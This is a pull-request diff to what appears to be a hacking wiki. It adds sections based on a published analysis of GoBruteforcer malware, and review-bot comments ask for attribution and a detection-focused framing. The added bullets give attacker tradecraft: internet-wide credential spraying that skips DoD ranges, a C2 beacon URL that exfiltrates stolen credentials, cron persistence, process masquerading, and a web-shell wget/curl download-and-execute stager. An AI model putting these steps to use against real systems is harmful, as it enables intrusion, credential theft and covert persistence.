12 changes: 12 additions & 0 deletions src/generic-hacking/brute-force.md
Expand Up @@ -95,6 +95,14 @@ Finished in 0.920s.
- [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
- [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)

## Internet-wide bruteforcer workflow (lessons from Go-based scanners)

- Maintain **architecture-tuned worker pools** (for example, ~95 goroutines on `x86_64/arm64`, ~85 on `i686`, ~50 on low-end ARM) and respawn every second to keep **fixed concurrency**, with each worker handling exactly one target IP before exiting.
- Generate **random public IPv4s** but drop obvious honeypot-heavy or unroutable ranges: RFC1918, `100.64.0.0/10`, `127.0.0.0/8`, `0.0.0.0/8`, `169.254.0.0/16`, `198.18.0.0/15`, multicast `>=224.0.0.0/4`, cloud-heavy `/8`s (`3/15/16/56`) and DoD-associated `/8`s (`6/7/11/21/22/26/28/29/30/33/55/214/215`).
- **Probe the service port** with a short timeout (~2s) before attempting **cleartext logins** (FTP/21, MySQL/3306, Postgres/5432, phpMyAdmin over HTTP/80) and fall back to a **small builtin credential list** if the remote dictionary/C2 fetch fails.
- **Exfiltrate hits** via tiny HTTP GET beacons such as `http://<c2>:9090/pst?i=<ip>&c=<svc_code>&u=<user>&p=<pass>&e=<extra>` (service codes like `1=PMA`, `2=MySQL`, `3=FTP`, `4=Postgres`) while reusing a common browser User-Agent to blend in.
- **phpMyAdmin spray** can brute-force dozens of likely paths (~80+) with `GET /index.php?lang=en`, detect PMA markers (`pmahomme` theme/`phpmyadmin.css`/`navigation.php`) and parse `codemirror.css?v=X.Y.Z` to branch auth: versions `<4.9` accept GET params `pma_username`/`pma_password`; versions `>=4.9` require POST with `server=1`, CSRF `token`, and the same creds.

## Services

Ordered alphabetically by service name.
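Review bot: The new `## Internet-wide bruteforcer workflow (lessons from Go-based scanners)` section describes observed GoBruteforcer behaviour but is written as a how-to and never cites its source inline; the only attribution is the Check Point link appended to `## References` at the very end of the file. Put a one-line attribution at the top of the section (for example `Behaviour documented in Check Point's GoBruteforcer analysis (see References)`) and retitle it so it reads as a malware profile rather than a recommended workflow. The most useful content in these bullets for a reader is the set of detection artifacts, and they should be labelled as such: the fixed beacon format `http://<c2>:9090/pst?i=<ip>&c=<svc_code>&u=<user>&p=<pass>&e=<extra>` with its service codes `1=PMA` to `4=Postgres`, the `GET /index.php?lang=en` spray across ~80 phpMyAdmin paths, and the ~2s port probe immediately preceding cleartext logins are all simple signatures for proxy and IDS logs. The phpMyAdmin auth branch (`pma_username`/`pma_password` as GET params below 4.9, POST with `server=1` and a CSRF `token` from 4.9) is asserted with no source; cite the report or the phpMyAdmin changelog for the version boundary.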
Expand Down Expand Up @@ -893,6 +901,10 @@ Cracking Common Application Hashes
1700 | SHA-512 | Raw Hash
```

## References

- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)

{{#include ../banners/hacktricks-training.md}}


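Review bot: The `## References` entry added here is the sole source for the `Internet-wide bruteforcer workflow` section added earlier in this file, but nothing in that section points back to it; either cite it inline there or annotate the entry with what it supports. The entry also lacks the author/venue prefix that the other reference list touched by this PR uses (`0xdf – HTB Planning (...)`); `Check Point Research – Inside GoBruteforcer: ...` would match.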
12 changes: 12 additions & 0 deletions src/linux-hardening/linux-post-exploitation/README.md
Expand Up @@ -120,12 +120,24 @@ Hardening
- Avoid embedding creds in unit files; prefer root-only readable drop-in files and remove them from version control
- Rotate leaked passwords discovered during tests

## Cron-based persistence with loopback mutex

- Copy implants into multiple writable paths (`/tmp`, `/var/tmp`, `/dev/shm`, `/run/lock`) and install cron entries such as `*/5 * * * * /tmp/<bin>` so they respawn even if removed elsewhere.
- Enforce **single-instance** execution by binding a fixed loopback port (for example, `127.0.0.1:51125` or `127.0.0.1:52225`) and exiting if `bind()` fails; `ss -lntp | grep -E '51125|52225'` will reveal the mutex listener.
- Operators may periodically mass-kill any process whose `cmdline` contains the dropper name (e.g., `init_stop`), so reusing those names during analysis can collide; pick unique filenames.

## Process masquerading via prctl + argv overwrite

- Set the short process name with `prctl(PR_SET_NAME, "<label>")` (15-byte `comm` limit), commonly to `init`, so `/proc/<pid>/status` and GUIs show a benign label.
- Overwrite the in-memory `argv[0]` buffer after reading `/proc/self/cmdline` length and the `argv[0]` pointer, padding with NULs so `/proc/<pid>/cmdline` and `ps` also show the fake label.
- Hunt by comparing `Name:` in `/proc/<pid>/status` against the real executable path and looking for loopback mutex listeners owned by processes with tiny/blank cmdlines.

## References

- [0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html)
- [alseambusher/crontab-ui](https://github.com/alseambusher/crontab-ui)
- [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
- [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir)
- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)

{{#include ../../banners/hacktricks-training.md}}
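Review bot: `Operators` in the bullet `Operators may periodically mass-kill any process whose cmdline contains the dropper name (e.g., init_stop)` is ambiguous: it reads as the red-team operator, but the preceding mutex bullet implies it is the implant itself killing competing copies. Name the actor explicitly (`the implant periodically kills ...`). Two smaller points in the same hunk: `ss -lntp | grep -E '51125|52225'` only shows the owning process for other users' sockets when run as root, so write `sudo ss -lntp`, and the grep matches anywhere on the line (including the `pid=`/`fd=` fields), so filter on the port instead, e.g. `ss -lntp '( sport = :51125 or sport = :52225 )'`. In the hunt bullet of `## Process masquerading via prctl + argv overwrite`, `real executable path` should say where it comes from: `prctl(PR_SET_NAME)` and the `argv[0]` overwrite change `comm` and `/proc/<pid>/cmdline` but not the `/proc/<pid>/exe` symlink, so the comparison to make is `readlink /proc/<pid>/exe` against `Name:` in `/proc/<pid>/status`.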
10 changes: 10 additions & 0 deletions src/network-services-pentesting/pentesting-ftp/README.md
Expand Up @@ -146,6 +146,12 @@ If your user/password has special characters, the [following command](https://st
wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/
```

### FTP root mapped to webroot (XAMPP)

- XAMPP/ProFTPD often maps FTP root to `/opt/lampp/htdocs`, so weak creds on service accounts like `daemon` or `nobody` let you **upload a PHP web shell directly into the served webroot**.
- After uploading, trigger an **architecture-aware download/exec stager** via the shell, for example: `webshell.php?dmc=(wget -qO - http://<compromised_host_ip>/.x/?x=x86 || curl http://<compromised_host_ip>/.x/?x=x86)`, which fetches a checksum-validated payload, saves it (e.g., `init_start`), sets `chmod +x`, and runs it.
- If the current directory is not writable/executable, the stager falls back to `/tmp`, so test web paths and filesystem permissions after upload.

## Some FTP commands

- **`USER username`**
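Review bot: The second bullet of `### FTP root mapped to webroot (XAMPP)` attributes to the quoted command work it does not do: `webshell.php?dmc=(wget -qO - http://<compromised_host_ip>/.x/?x=x86 || curl http://<compromised_host_ip>/.x/?x=x86)` only fetches the remote script to stdout; the checksum validation, saving as `init_start`, `chmod +x` and execution are performed by the fetched script, so reword to `which fetches a stager script that validates a checksum, saves the payload (e.g., init_start), ...`. The bullet also reproduces one campaign's C2 path (`/.x/?x=x86`) and dropper filename without citing the Check Point report it comes from; cite it inline and present these values as IoCs, since that is their value to a reader. The first bullet's claim that weak creds on `daemon` or `nobody` suffice depends on a precondition that should be stated: the account must be permitted to log in over FTP and have write access to `/opt/lampp/htdocs`. A closing mitigation line would round the section off: do not map the FTP root onto the served webroot, keep the FTP account non-writable there, and alert on new `.php` files appearing under `htdocs`.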
Expand Down Expand Up @@ -279,4 +285,8 @@ Entry_7:
Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
```

## References

- [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/)

{{#include ../../banners/hacktricks-training.md}}